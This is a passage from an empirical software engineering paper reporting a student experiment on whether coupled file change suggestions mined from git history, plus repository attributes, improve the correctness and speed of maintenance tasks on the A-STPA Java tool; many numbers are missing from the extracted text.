ha.2: there is a significant difference in the perceived usefulness among the attributes from the software repository in the current set.
experiment variables we define the following dependent variables: the correctness of the solution after the execution of the maintenance task, the time spent to perform the maintenance task and the usefulness of the repository attributes. for the first variable, the correctness of the task solution, we assign scores to each developer’s solution of the maintenance tasks. our approach is similar to the one presented by ricca et al. ( ) where the correctness of the solution of the maintenance task is manually assessed by defining scores from totally incorrect to completely correct task solution. we define three scores: if the developers did not execute or did not solve the task at all, if the task was partially solved and if the developer performed a complete solution of the maintenance task. the solutions are tested using unit tests to ensure the correctness of the edited source code. the second variable, the time required for executing the maintenance tasks is measured by examining the screen recordings. we mark the start time and the end time for every task. we calculate the difference to compute the total time needed to solve each task. we differentiate the time needed only to solve the tasks ts and the time needed to determine the relatedness of the coupled files tr. for the third variable, the usefulness of the repository attributes, we use an ordinal scale to identify the feedback of the developers. the participants can choose between the following options for each attribute: very useful, somewhat useful, neutral, not particularly useful and not useful. we code the usefulness feedback using the scoring presented in table . experiment design we distinguish two cases for the maintenance tasks: the first one includes tasks executed on java code in the eclipse ide without any suggestions and the second one includes tasks ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table usefulness score. very useful somewhat useful neutral not particularly useful not useful table experiment design. lab tasks lab tasks – (−) tasks – (+) lab tasks – (+) tasks – (−) executed with additional coupled files suggestions and corresponding attributes from the repositories. we use a similar approach to the one presented by ricca et al. ( ) and define two values: − for eclipse only and + for the coupled file suggestions. we use a counterbalanced experiment design as described in table . this ensures that all subjects work with both treatments: without and with coupled change suggestions. we split the subjects randomly into two groups working in two lab sessions of two hours each. in each session, the participants work on two tasks using only the task description and on two tasks using coupled file change suggestions and their related attributes. the participants in the second lab swapped the order of the tasks in the first lab. objects the object of the study is an open source java software called a-stpa. the source code and the repository were downloaded from sourceforge (https://sourceforge.net/projects/ astpa/). the system was built mainly in java by developers at the university of stuttgart during a software project between and . it represents an eclipse-based tool for hazard analysis. the source code contains , lines of code and classes organized in packages. the git repository of the project contains , commits from which we extracted coupled file changes. 
subjects the experiment participants are students from the software engineering course in their second semester at the university of stuttgart (germany). the students have basic java programming and eclipse knowledge and have not been related in any way with the software system investigated in the experiment. materials, procedure and environment all subjects received the following materials which can be found in the supplemental material of this paper. • tools and code: the participants received the eclipse ide to work with, the screen capturing tool and the source code they need to edit. • questionnaires: the first questionnaire is filled in at the start of the experiment and it is related to their programming background. the second questionnaire performed at the end of the experiment is about their feedback on the usefulness of coupled changes and the additional set of repository attributes. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://sourceforge.net/projects/astpa/ https://sourceforge.net/projects/astpa/ http://dx.doi.org/ . /peerj-cs. • software documentation: we provided the technical documentation for the software system including the architecture description covering the sub-projects, the overview of the classes in the data model, the application controllers, the graphic editor and the package descriptions. • setup instructions: the participants received the instruction steps how to prepare the environment, where to find the ide, the source code and how to perform the experiment. • maintenance tasks and description: every participant received spreadsheets with four maintenance tasks and their free-text description. the maintenance tasks represent quick program fixes that should be performed by the participants according to the maintenance requests (basili, ). the maintenance tasks used in the experiment require the participants to add various enhancements to the system. the changes do not influence the structure or the functionalities of the application. the tasks are related to simple changes of the user interface of the system. all four maintenance tasks are perfective and have been assigned to the participants in both groups. • set of coupled files: the files changed together frequently used to solve a similar tasks have been provided to the group that uses coupled file changes. • repository attributes: the attribute set from the versioning system, the issue tracking system and the documentation about similar tasks performed in the system. they have been joined to the coupled files using a mapping between the commits containing the coupled files and the issues using their issue ids. the environment for the experiment tasks was eclipse ide on a windows pc in both treatments. for each lab, we prepared an eclipse project containing the java source code of the a-stpa system. the project materials were made available to the subjects on a flash drive. the participants had a maximum of two hours to fill the questionnaires and perform the maintenance tasks. selection of change author according to the used heuristic for grouping the change sets in the versioning history, we need to select the authors of the changes whose data will be included in the analysis. the selection process of the developers as authors of the source code changes is presented in fig. . out of developers who worked on the a-stpa software, after performing the frequent itemset analysis, we have eight developers left whose entries in the repository delivered coupled files. 
we have four maintenance tasks to be solved in the experiment. for each of the tasks we use commits from a different developer to avoid the influence of the authorship of the commits on the tasks. out of the eight developers we need to select four, one for each maintenance task. selection of coupled files after selecting the developers, we continue with the selection of the coupled files. the process includes the selection of the most frequent coupled files followed by the selection of relevant coupled files as presented in fig. . ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure changes selection. full-size doi: . /peerjcs. /fig- selection of the most frequent coupled files we need to select the coupled files which we will include in the suggestions for the developers in the experiment. for each of the four developers we list the most frequent coupled files we have extracted. we sort the sets of coupled file changes by their frequency in descending order, so on top of the list we have the most frequent set of coupled files. we start selecting the sets of coupled files from the top of the list. we do this for two main reasons: ( ) to avoid a potential subjectivity in the selection of the coupled files. ( ) we want to use the strongest couplings, meaning the coupled files which are frequent and did not happen by chance. selection of relevant coupled files after identifying the most frequent coupled files, we examine their broader change context. this means that we need to determine if they fulfill the requirements to be: ( ) of perfective nature and ( ) related to modifications in the user interface of the application. we determine this change context using a manual analysis of the content of the commit messages where the coupled file changes were included as well as the description of the related issues. to perform this, we use the mappings between the commit messages and the issue ids provided as part of the corresponding repository attributes we added to the coupled file changes. classification of issues we classified the issues for the examined software systems using the approach proposed in hindle, german & holt ( ). we determine the following classes of issues: • corrective: these issues cover failures related to the processing or performance of the software. • adaptive: these changes include modifications related to the data and the processing environment. • perfective: the changes include modifications related to performance, maintenance or usability improvements. • implementation: these tasks include new requirements for the software system. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. • other: these include changes that are not functionally related to the system like copyright or control version system related issues. we go further and classify the perfective changes based on the most frequently involved system functionalities. for example, we want to know how many perfective issues have been defined for the user interface of the application and what are the main parts of this interface addressed in these issues. this way we expose the representativeness of the selected coupled file changes and the defined tasks for the software system we examine. 
definition of tasks after we determined the sets of coupled file changes which fulfill the requirements of the experiment, we continue with the definition of the tasks the participants need to solve. firstly, we determine the change context of the selected coupled file sets more precisely by looking up repeatedly in the related commit messages and the issue description. this identifies the functionality the file changes are related to. we use the mapping of the issue ids and the commit messages to follow up this information. after we identified the issues related to sets of relevant coupled file changes, we define perfective maintenance tasks related to similar functionalities covered in these issues. for example, in table we have an issue extracted from the issue tracking system of the a-stpa product which defines that a new item in the application view should be created using a keyboard shortcut. the commit message for the changes solving this task represents the comment of the developer who placed the shortcut. considering the described functionality, we create a task where the developer needs to create a new shortcut combination for that purpose. in the same manner, we repeat the procedure for each of the relevant coupled files that we have selected and define four tasks. the content of the text description of the tasks is related to the content of the issues we extracted from the issue tracking system. we keep the content of the task definitions very simple. they contain the functionality or the part of the system which has to be changed and the action to be performed. this makes it easier to replicate the process using other software products and their repositories. tasks and coupled file changes our goal is for each of the tasks to provide coupled file changes related to their context. this feature is of great importance for the study. offering unrelated coupled file can be misleading and confusing for the developers. we can extend the examination of the commit messages content and the issue descriptions to determine the change context as a part of a tool using natural-language processing techniques. we can compare the content of the user input or the issue content with the comments in the commit messages or issue description we mapped to the coupled file change sets. however, this exceeds the scope of this study and can be considered as future work. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table task information and coupled file changes. . user task task solution file set change the shortcut for adding new items in all the user interface views from ‘‘swt.keydown and ‘n’’’ into ‘‘swt.keyup and ‘y’’’ controlactionview.java systemgoalview.java designrequirementview.java safetyconstraintview.java hazardsview.java accidentsview.java related commit suggested coupled changes i have set a simple shortcut for new items to be ‘‘n’’, which can be quickly changed if needed. controlactionview.java designrequirementview.java safetyconstraintview.java accidentsview.java related issue using a keyboard shortcut, a new item should be created in the application views. solution of tasks the complete list of files included in the task solutions are defined manually by analyzing the solutions of the related issues and evaluated by an independent party. an example of the relation between the files included in the solution for a particular maintenance task and the set of coupled file changes is presented in table . 
here, we can see that to be able to solve the mentioned task, the developer needs to change six files which are related to the views of the application. the coupled change suggestion based on an issue related to the defined task recommends four files to be changed. these files were extracted from the version history have been changed frequently together in the past. we would like to point out that the file change suggestions do not represent the solutions for a particular task in the experiment. the solution usually contains more files than the provided suggestions. although the provided suggestions contain a subset of the solution set, the developers still need to find the location in the source code meaning the method or the class that they need to modify in order to solve the tasks. this is finer grain information that we do not provide in our coupled files. the developers still have to read the repository attributes and decide if they want to follow the coupled file change suggestions. maintenance activities after receiving the task description, the participants investigate the source code of the application, identify the files where the changes are needed and perform the changes according to the requirement. the scenario for solving the provided maintenance tasks includes the following activities (nguyen, boehm & danphitsanuphan, ): • task understanding: first of all, the participants need to read the task description and the instructions and prepare for the changes. they can ask if they need some clarification about the settings and the instructions. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the questionnaires are available in the supplemental material of this paper. • change specification: during this step, the participants locate the source code they need to change, try to understand and specify the code change. • change design: this step includes the execution of the already specified source code changes and debugging the affected source code. • change test: to specify the successfulness of the performed code changes, a unit test needs to be performed. this step is performed by the experiment organizers after the lab sessions. data collection procedure we collect data from several sources: the software repository of the system, the questionnaires, the provided task solutions and the screen capture recordings. software repositories • version control system: the first data source that we use is the log data from the version control system. the investigated project uses git as a control management tool. it is a distributed versioning system allowing the developers to maintain their local versions of source code. this version control system preserves the possibility to group changes into a single change set or a so-called atomic commit regardless of the number of directories, files or lines of code that change. a commit snapshot represents the total set of modified files and directories (zimmermann et al., ). we organize the data in a transaction form where every transaction represents the files which changed together in a single commit. from this data source we extract the coupled file changes and the commit related attributes. • issue tracking system: it stores important information about the software changes or problems. in our case, the developers used jira as their issue tracking system. this data source is used to extract the issue-related attributes. 
• project documentation: the software documentation gathered during the development process represents a rich source of data. the documentation contains the data model and code descriptions. from these documents, we discover the project structure. for example, in the investigated project, the package containing the files described by the following path: astpa/controlstructure/figure/, contains the java classes responsible for the control diagram figures of this software. we use the documentation to identify the package description. the complete set of attributes we extract from the software repository is presented in table . questionnaire the developers answer a number of multiple-choice questions. using the first questionnaire, we investigate the developers’ programming background. we use a second questionnaire after the tasks are solved in order to gather the feedback on the usefulness of coupled changes and the additional attributes. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table repository attributes description. attribute name attribute description commit id unique id of git commit commit message free-text comment of the commit in git commit time time-stamp of committed change in git commit author person who executed the commit issue description free-text comment on issue to be solved issue type type of the issue: bug, feature issue author person who created the issue to be solved package description free-text description of the package: layer, feature tasks completion similar to other studies (chan, ; nguyen, boehm & danphitsanuphan, ; ricca et al., ), we define two factors which represent the completion of the maintenance tasks: • correctness of solution: we determine the correctness of the solution by examining the changed source code if the solution satisfies the change requirements. we use the scoring presented previously where we summarize the points each developer gathers for each of the four tasks. the score is added next to each of the participants for both treatments, with and without using coupled file changes. • time of task completion (ts): this represents the time measured in minutes the developers spent to solve the maintenance tasks. having a scenario where the developers only need to solve the tasks, the selection of the coupled files is not included in the total time for the tasks. it does not include the time needed to determine the relatedness of the coupled files for a specific task. the completion time could be automatically determined using a tool implementation or as part of an analysis procedure and does not represent part of the developer task solution. we use a screen capturing device to record the time that each participant spends solving each of the four tasks. we record the time needed for each task in both treatments. • time required to determine the relevance of the coupled files (tr): this represents the time needed to determine the change context of each of the coupled files related to the tasks. considering a worst-case scenario, the selection of the coupled files has to be performed by the developers and the time needs to be calculated for the group using coupled file change suggestions. in this case, the total time needed for each of the tasks is the sum (tr +ts) of the time needed to select the coupled files and the time to solve the task. 
given the task list, the coupled files list and the issue list, we record the time the developers need to go through the process of determining the change context of the coupled files we examine for a given task. we use three additional developers to measure the time required to determine the context of each of the coupled file changes related to the tasks.

data analysis procedure. to be able to test our hypotheses, we need to analyze the usefulness of the coupled file changes and the usefulness of the attributes from the software repository. we perform the analysis using the spss statistical software.

usefulness of coupled file changes. the main part of the analysis is the investigation of the usefulness of the coupled changes. for this purpose we compare the scores of each task solution and the amount of time needed for solving the tasks in both groups: without coupled file suggestions and with coupled file suggestions. for the time needed for the solution, we only use the values for the accomplished tasks. this way we ensure that the values for the unsolved tasks do not corrupt the overall values for the time needed to successfully solve the tasks. here we have two main scenarios: the first one includes only the time the developers need to solve the tasks; the second scenario also includes the time needed to select the coupled files set related to a specific maintenance task. we calculate the mean time for a particular task. furthermore, we repeat the calculation for each participant on the task. finally, we determine the grand mean as the average of all the means of the time values for each of the tasks determined by the participants, weighted by the sample size; in our case this is the number of coupled files. having k populations or tasks, the ith observation is tr_i, which belongs to the j(i)th coupled files set; we write j(i) to indicate the group associated with observation i. let i vary from 1 to n, the total number of samples (in our case, the coupled files), and let j vary from 1 to k, the total number of tasks. there are a total of n observations with n_j observations in sample j: n = n_1 + ... + n_k. the grand mean of all observations is calculated using the formula:

\overline{tr} = \sum_{j=1}^{k} \left( \frac{n_j}{n} \right) \overline{tr}_j \quad (2)

here, \overline{tr} is the average of the sample means, weighted by the sample size (hanlon & larget, ). to determine the usefulness of coupled file changes, we test the overall difference in the correctness of solving the tasks using the two-tailed mann-whitney u test. it tests the hypothesis that two samples from the same population have the same median against the alternative that one of them tends to have larger values, so we test the statistical significance of the difference between two value sets. determining an appropriate significance threshold defines whether the null hypothesis must be rejected (nachar, ). if the p-value is small, the null hypothesis can be rejected, meaning that the value sets differ; if the p-value is large, the values do not differ. usually a 0.05 level of significance is used as the threshold. the p-value alone is not enough to determine the strength of the relationship between variables; for that purpose we report the effect size estimate (tomczak & tomczak, ). we use a conservative approach where we test the difference in the correctness of our tasks.
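the weighted grand mean of eq. (2), the two-tailed mann-whitney u test and the effect size of eq. (3) can be reproduced outside spss; the following sketch uses scipy with invented time values, and derives z from the u statistic via the usual normal approximation, which is an assumption (the paper takes z from the spss output).

```python
# illustrative sketch only: the weighted grand mean of eq. (2), the two-tailed
# mann-whitney u test and the effect size r = z / sqrt(n) of eq. (3), computed with
# scipy instead of spss. the time values are invented, and z is derived from the
# u statistic via the usual normal approximation.
import math
import numpy as np
from scipy.stats import mannwhitneyu

def grand_mean(samples):
    """samples: one list of time values per task; each task mean is weighted by its size."""
    n = sum(len(sample) for sample in samples)
    return sum(len(sample) / n * np.mean(sample) for sample in samples)

def mann_whitney_with_effect_size(group_a, group_b):
    u, p = mannwhitneyu(group_a, group_b, alternative="two-sided")
    n1, n2 = len(group_a), len(group_b)
    z = (u - n1 * n2 / 2.0) / math.sqrt(n1 * n2 * (n1 + n2 + 1) / 12.0)
    r = abs(z) / math.sqrt(n1 + n2)  # effect size, eq. (3)
    return u, p, r

with_suggestions = [12.0, 15.5, 9.0, 14.0, 11.5]      # minutes, invented
without_suggestions = [16.0, 18.5, 13.0, 20.0, 17.5]  # minutes, invented
print(grand_mean([with_suggestions, without_suggestions]))
print(mann_whitney_with_effect_size(with_suggestions, without_suggestions))
# for the attribute feedback (rq2) the corresponding omnibus test would be
# scipy.stats.kruskal(scores_attr_1, scores_attr_2, ...).
```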
without differentiating the tasks, we compare all the solutions of the tasks using coupled file changes against the tasks performed without any suggestion. we repeat the same approach to test the overall difference between the time needed to solve the tasks using coupled change suggestions and the time for the tasks solved without the help of coupled file changes. we use the spss statistical software and its typical output for the mann-whitney u test, whereby the p-value of the statistical significance of the difference between the two groups is reported. the mean ranking determines how each group scored in the test. to support a statistical difference between the samples, we calculate the r-value of the effect size proposed in cohen ( ) using the z value from the spss output (fritz, morris & richler, ). a value of 0.5 indicates a large effect, 0.3 a medium effect and 0.1 a small effect (coolican & taylor, ). given that our study is restricted to a small number of comparisons, we do not adjust the p-value using a procedure like the bonferroni correction (armstrong, ).

usefulness of attributes. we analyze the feedback from the questionnaire to investigate which attributes are useful. we investigate every attribute in the set extracted from the versioning system, the issue tracking system and the documentation, as previously presented. for that purpose we use the kruskal-wallis h test, an extension of the mann-whitney u test. using this test, we determine whether there are statistically significant differences between the medians of more than two independent groups, i.e., we test the statistical significance between more than two value sets. the significance level determines whether we can reject the null hypothesis; p-values below 0.05 mean that there is a significant difference between the groups (pohlert, ). to determine the effect size for the kruskal-wallis h test, we calculate the effect sizes for the pairwise mann-whitney u tests for each of the attributes using the z statistic. we individually calculate the r-value of the effect size for each pair comparison. the r-value is calculated using the following formula:

r = \frac{z}{\sqrt{n}} \quad (3)

our approach tests the differences in the feedback about the usefulness between all the attributes for all participants. this way we identify which attributes we should offer to the participants when solving their tasks together with the coupled file change suggestions. using spss, we provide the statistical significance values of the difference between all eight attributes. the ranking of the means of the usefulness feedback values determines the most useful attributes.

execution procedure. • log extraction: we extract the information from the git log containing the committed file changes and the attributes. the log data is exported as a text file and the output is managed using appropriate log commands. • data preprocessing: after the text files with the log data have been generated, we continue with the preparation of the data for mining. various data mining frameworks
we use the thresholds that give us a frequent yet still manageable number of couplings. this threshold is normally defined by the user. we use the technique presented in (fournier-viger, ) to identify the support level. these values vary from developer to developer, so we test the highest possible value that delivers frequent item sets. if the support value does not yield any useful results for a particular developer, we drop the value of the threshold. we did not consider item sets with a support rate below . , meaning the coupled changes should have been found in percent of the commits. • mining framework: there is a variety of commercial and open-source products offering data mining techniques and algorithms. for the analysis, we use an open-source framework specializing in mining frequent item sets and association rules called the spmf-framework (http://www.philippe-fournier-viger.com/spmf). it consists of a large collection of algorithms supported by appropriate documentation. • experiment preparation: we prepare the environment by setting up the source code and the eclipse where the participants will work on the tasks. we define the maintenance tasks and provide the free text description. we prepare the coupled file changes and the attributes from the software repository to be presented to the participants in the experiment. • solving tasks: the participants in both groups work for two hours in two labs and provide solutions for the maintenance tasks. the solution and the screen recording are saved for further analysis. • material gathering: we gather the questionnaires, the edited source codes and the video files of the participants screens for further analysis. • solution analysis: we analyze the scores for the correctness of the maintenance tasks, calculate the time needed for solving the tasks and determine the influence of the coupled file changes on the task solution. results and discussion the complete list of the maintenance tasks, the coupled file changes, the software repository attributes, the questionnaires and the analysis results can be found in the supplemental material of this paper. participants the participants’ feedback about their background reports that most of them have around one year of programming experience and less than one year of experience with versioning and issue tracking systems. none of them answered to be in any way involved on the a-stpa project. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.philippe-fournier-viger.com/spmf http://dx.doi.org/ . /peerj-cs. table issue classification. issue category frequency % corrective . implementation . perfective . adaptive . other . table perfective issues. change category frequency % views , control structure , menus , non functional source changes , issues classification based on the proposed classification from hindle, german & holt ( ), we classified the issues from the issue tracking system related to commits in the git version history as presented in table . here we can see that most changes of the system are corrective, implementation and perfective issues. further, we examined the perfective issues in more detail to determine to which parts of the system they are related. we have identified several classes of perfective issues related to the main functionalities of the system that we investigated in the experiment as presented in table . 
the most frequent perfective issues are related to changes to the view elements of the system user interface responsible for the visualization of the hazard analysis steps, including their layout, tables, grids, text fields, buttons, icons and labels. these changes have been organized in the class called views. the next class, called control structure, is composed of the issues that cover changes related to the control structure functionality of the user interface. it is responsible for drawing the diagrams, connects the layout components and includes changes to the diagram elements like objects, labels and connections. the following class, which we call menus, is related to the issues associated with the user interface menus used to create and edit project elements, including changes to the wizards, the actions, labels and icons. the last class includes the issues covering non-functional changes in the source code like cleanups, refactoring or formatting. the task distribution in the experiment corresponds to this classification. we defined two tasks for the application views, one task for the menus and one task for the control structure of the user interface.

figure : task correctness distribution.

usefulness of coupled file changes
as we already explained, we operationalize the usefulness of coupled file changes by their influence on the correctness of the solutions and the time needed to solve the tasks.

correctness
we summarize the correctness distribution as presented in fig. . on the y-axis we have the frequency of occurrence and on the x-axis the score for solving the tasks. here, the observations are grouped based on the presence of coupled change suggestions during the maintenance task solution. from this figure we see that the participants achieved better scores using the coupled file change suggestions we provided. we investigate the correctness difference between the two groups by testing the first null hypothesis of the first research question, which claims that there is no significant difference in the correctness of the task solutions. applying the mann–whitney u test results in a p-value of . , as presented in table . this value is lower than the threshold of . , so this null hypothesis can be rejected. this means that there is a statistically significant difference in the correctness of the solutions for the provided tasks when using coupled file change suggestions compared with the correctness of the solutions using only the provided task description. the r-value of the effect size for the correctness is . , which indicates a strong statistical difference in the correctness of the maintenance task solutions between the groups that did or did not use coupled change suggestions.

table : statistical significance (coupled changes).
depend. variable    p-value    r-value
correctness         .          .
time effort         .          .

table : descriptive statistics for the correctness of the tasks.
                           completely solved tasks    median    mad
without suggestions (−)        %                      .
with suggestions (+)           %

in table , we present the descriptive statistics for the correctness of the task solutions. the participants who used the suggestions solved . % of the tasks completely, whereby the participants not using the suggestions solved only % of the tasks. this shows a significantly higher score for the group using coupled change suggestions. the median absolute deviation (mad) value for the group using coupled changes is , whereby the value for the group not using coupled changes is . these values show that the correctness scores are spread very close to the median for the first group.

the statistical results provide evidence that the coupled file changes significantly influenced the correctness of the maintenance tasks in the experiment. inexperienced developers solved more tasks when using our suggestions, which means they benefited from hints related to similar tasks. the coupled change suggestions allow the developer to follow a set of files and remind him/her that similar tasks include changes in various locations in the source code. the improvement in the number of solved tasks for the group using the coupled change suggestions shows that these developers used the additional help in locating the features and the files to be modified to solve their tasks successfully. the group that did not have this kind of help did not succeed in solving the same or a higher number of tasks, which points to the usefulness of our approach. the benefit of coupled file changes was especially noticeable in cases where the developer needs to perform similar changes in several locations, like editing different views of the application gui. here, the developers not using coupled change suggestions missed implementing the change in all the files where the change should have been performed. coupled file change suggestions help the developers not to miss other source code locations they need for their task.

time
we analyzed the influence of using coupled file change suggestions on the time needed to successfully perform the tasks versus not using them. many participants used a split screen and kept the documentation window open, so we were not able to subtract the time spent reading the documentation from the total amount needed to solve the tasks. the distribution of the values for the time needed to solve the tasks is presented in fig. . we see that the distributions are similar, with a slight tendency towards more time needed to solve the tasks without suggestions.

figure : time boxplots (ts).

we test the second null hypothesis, which claims that there is no influence of the coupled file changes on the time needed to solve the tasks. the distribution including the time to determine the relatedness of the coupled files is presented in fig. . considering only the time needed to solve the tasks (ts), the p-value for the two-tailed test is . . this value is slightly below the . threshold for the significance of the difference in the time needed to solve the tasks by the group using coupled file changes versus the group that did not. therefore, we reject the null hypothesis. the r-value for the time needed to solve the maintenance tasks is . , which shows a relatively small statistical difference between the group that used coupled change suggestions and the group that did not. considering the case where we add the time to select the coupled files to the time needed to solve the tasks (tr + ts), we can see that there is almost no difference in the time measured for the group not using the coupled files and the group using coupled files.

here, the p-value for the total time is . , which means that in this case the null hypothesis cannot be rejected. the r-value for the total time is . , which emphasizes this small difference between using and not using coupled file change suggestions. after calculating the grand mean for tr, we added three more minutes to the amount of time for the task solution and included it in the analysis of the difference between both groups regarding the use of coupled file change suggestions.

figure : time boxplots (tr + ts).

the time needed to determine the related coupled files for the additional participants is presented in table . for the total time including the time needed to select the coupled files, we add the number of considered coupled files per task and the mean time the developers needed to select the coupled files for the particular task. the descriptive statistics in table for the time needed to solve the tasks report a decrease in the mean time needed to solve the tasks by % for the group using coupled change suggestions. the ranking of the means reports slightly better results for the group using coupled file changes, which means that the participants of this group solved their tasks slightly faster. the standard deviation for the group using coupled changes is about half of that for the group not using coupled changes, which shows a smaller spread for the first group. including the time needed to select the coupled files, the values are almost the same for both groups. from the results, we can see that in this case, because of the additional time we added for each of the participants, there is almost no difference between the mean values, which tells us that the group using coupled files did not manage to solve the tasks faster.

the results related to the task selection time show a small improvement in the time needed to solve the tasks. the developers using coupled change suggestions needed less time to find the files to be changed. without coupled file changes, they would need to search the source code for the features and files they need to edit.

table : time to determine related coupled files.
time (minutes)            task    task    task    task
participant    coupled files    coupled files    coupled files    –    –
participant    coupled files    coupled files    coupled files    –    –
participant    coupled files    coupled files    coupled files    –    –
all participants:
mean (coupled files)    .    .    .    .
grand mean (tasks)    .

table : descriptive statistics for the time needed in minutes.
                             median    mean    stand. dev.
without suggestions                    .       .
with suggestions (ts)                  .       .
with suggestions (tr + ts)             .       .

the improvement in the time needed to solve the tasks for the group using the coupled file changes is not as strong as the improvement in the correctness of the task solutions. it does not eliminate the time that the developers need to understand the features and the changes they need to perform in the source code. they still need time to organize this information and use it. furthermore, they need to read and understand the suggestions. coupled file change suggestions do not automatically provide a solution for solving their tasks.
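the significance tests and effect sizes reported above (the mann–whitney u test together with an r effect size, and descriptive statistics such as the mad) can be reproduced with standard statistical tooling; the fragment below is a minimal illustration with made-up scores, not the study's measurements.

    # minimal illustration of the statistics used above; the scores are placeholders.
    import numpy as np
    from scipy import stats

    scores_with = np.array([4, 3, 4, 2, 4, 3])      # hypothetical correctness scores
    scores_without = np.array([2, 1, 3, 2, 1, 2])

    u, p = stats.mannwhitneyu(scores_with, scores_without, alternative="two-sided")

    # effect size r = |z| / sqrt(N), with z recovered from the two-sided p-value
    n = len(scores_with) + len(scores_without)
    z = stats.norm.isf(p / 2)
    r = abs(z) / np.sqrt(n)

    mad_with = stats.median_abs_deviation(scores_with)
    print(f"u={u:.1f}, p={p:.3f}, r={r:.2f}, mad={mad_with:.1f}")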
if we include the time needed to select the coupled files, the results show that there is no improvement for the group using the coupled file change suggestions. if the coupled files need to be determined by the developers as a part of the task solution procedure, the small advantage for the groups using the suggestions disappears. an automated extraction of coupled file change suggestions including the determination of their relatedness could therefore be beneficial. usefulness of software repository attributes the distribution of the usefulness of each repository attribute is presented in fig. . the mean values for the usefulness of each of the repository attributes have been determined using the feedback of all participants in the experiment. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure usefulness of attributes. full-size doi: . /peerjcs. /fig- we test the third null hypothesis which claims that there is no difference in the usefulness between the attributes using the p-value of the kruskal-wallis h test. in our case, the p- value for this test is . which is lower than the . threshold. this result leads us to reject the null hypothesis. this means that the alternative hypothesis claiming that there is a significant difference in the perceived usefulness among the attributes from the software repository is true. we reported a set of various software attributes from the software repository. the participants reported their feedback on their usefulness at the end of the experiment lab after the tasks had been performed. we gathered the descriptive statistics for the participants’ feedback on the usefulness of each attribute presented in table . the median values vary from for the commit id, the commit author, the commit time, the issue author and the issue time, to for the commit message and the package description. this places the cutoff between ‘‘neutral’’ and ‘‘somewhat interesting’’ for most of the attributes. the mad value for all attributes is , which shows a low spread out of the usefulness values around the median. we calculated the r-value of the size effect for the repository attributes by creating pairs of each of the attributes where we determined the z-value of the mann–whitney test for each pair as presented in table . we have pairs of attributes. the greatest difference in the usefulness is between the commit time and the issue description where the r-value is . , followed by the difference between the commit time and the package description with an r-value of . . this indicates a high statistical significance between these pairs of attributes. the lowest difference is between the commit ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table descriptive statistics (attributes usefulness). attribute median mad package description issue description commit message issue type commit id commit author issue author commit time table statistical significance (coupled changes). p-value r-value repository attribute pairs . . commit id commit message . . commit id commit author . . commit id commit time . . commit id issue description . . commit id issue type . . commit id issue author . . commit id package description . . commit message commit author . . commit message commit time . . commit message issue description . . commit message issue type . . commit message issue author . . 
commit message package description . . commit author commit time . . commit author issue description . . commit author issue type . . commit author issue author . . commit author package description . . commit time issue description . . commit time issue type . . commit time issue author . . commit time package description . . issue description issue type . . issue description issue author . . issue description package description . . issue type issue author . . issue type package description . . issue author package description ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. id and the commit author, here the r-value is . , followed by the difference between the commit id and the issue author with an r-value of . . this shows that there are significant differences in the usefulness between individual attributes. we determined that the attributes have different usefulness using the feedback of the participants. the median ranking defines which of the attributes are most useful. as the most useful attribute we identify the package description followed by the issue description and the commit message. this leads us to the conclusion that the inexperienced developers seek for help about the features of the source code that they need to edit and the task that they have to complete. the issue type and the commit time are in the middle of the list. the most useless attribute is the commit author followed by the issue author and the commit id. here, we suppose that the developers are not interested in the information regarding who performed the changes because they do not know this person. this could change if the developers were included in the project for a longer time. although we produced a list of typical repository attributes, the participants have identified a smaller set of attributes to be useful for them than we provided in this experiment. this means that we do not have to present all the attributes to the developers together with the coupled files for the reason that different developers can happen to find some attributes as obsolete to be included in the coupled file change suggestions. an individual choice of useful attributes can avoid confusion and increase the acceptance of the coupled file change suggestions concept. threats to validity • internal validity: potential internal validity threats can rise from the experiment design. to limit the learning effect, we use a counterbalanced design where every developer solves four different tasks where each of them solves two tasks without and two tasks using coupled change suggestions. this way the results are not directly influenced by the task supported by the coupled file suggestions. other validity threats related to the experiment design are the selection of the coupled file changes, the creation of the maintenance tasks as well as their definition and solution. we extracted coupled files using a relatively high threshold which limits the possibility to provide suggestions for coupled changes that happened by chance. we selected the most frequent coupled files for each of the developers to avoid subjective interference. we also avoided delivering unrelated changes in order not to confuse the developer by providing suggestions out of the context. the maintenance tasks were constructed manually. 
however, they are related to issues from the issue tracking system and fulfill the conditions set in the experiment to be perfective and related to changes of the user interface. we classified the issues on the system based on the maintenance categories to show the representativeness of our maintenance tasks. the content includes a simple description of the functionalities and the required actions in order not to overwhelm the inexperienced developers by providing unnecessary information. ramadani and wagner ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the set of files included in the solution of the tasks was provided by manually analyzing related issue solutions. we validated the task solutions using a third party. the judgment of correctness of the developers’ task solutions represents another internal threat whereby we test the solutions to determine the level of correctness. the time needed to determine the relatedness of the coupled files can differ. to avoid an influence by particular tasks, we calculate the average time per coupled file set and calculate the grand mean for all tasks. we used independent student participants for the measurement of the time needed to select the related coupled files. also the metrics that we used to determine the usefulness can represent a threat. the subjective usefulness rating represents another construct validity whereby we evaluate the provided task solutions pairwise to minimize the errors in conducting the score distribution. for the time needed to solve the tasks, we play the captured screens of the participants to calculate the time the developers needed to solve the tasks. • external validity: the external validity threat concerns the generalization of the experiment. the main threats here are related to the choice of the coupled file changes, the type and description of the maintenance tasks as well as the participants and the system we investigate. we used a data mining technique that can be easily performed on other git repositories to extract coupled file changes. our 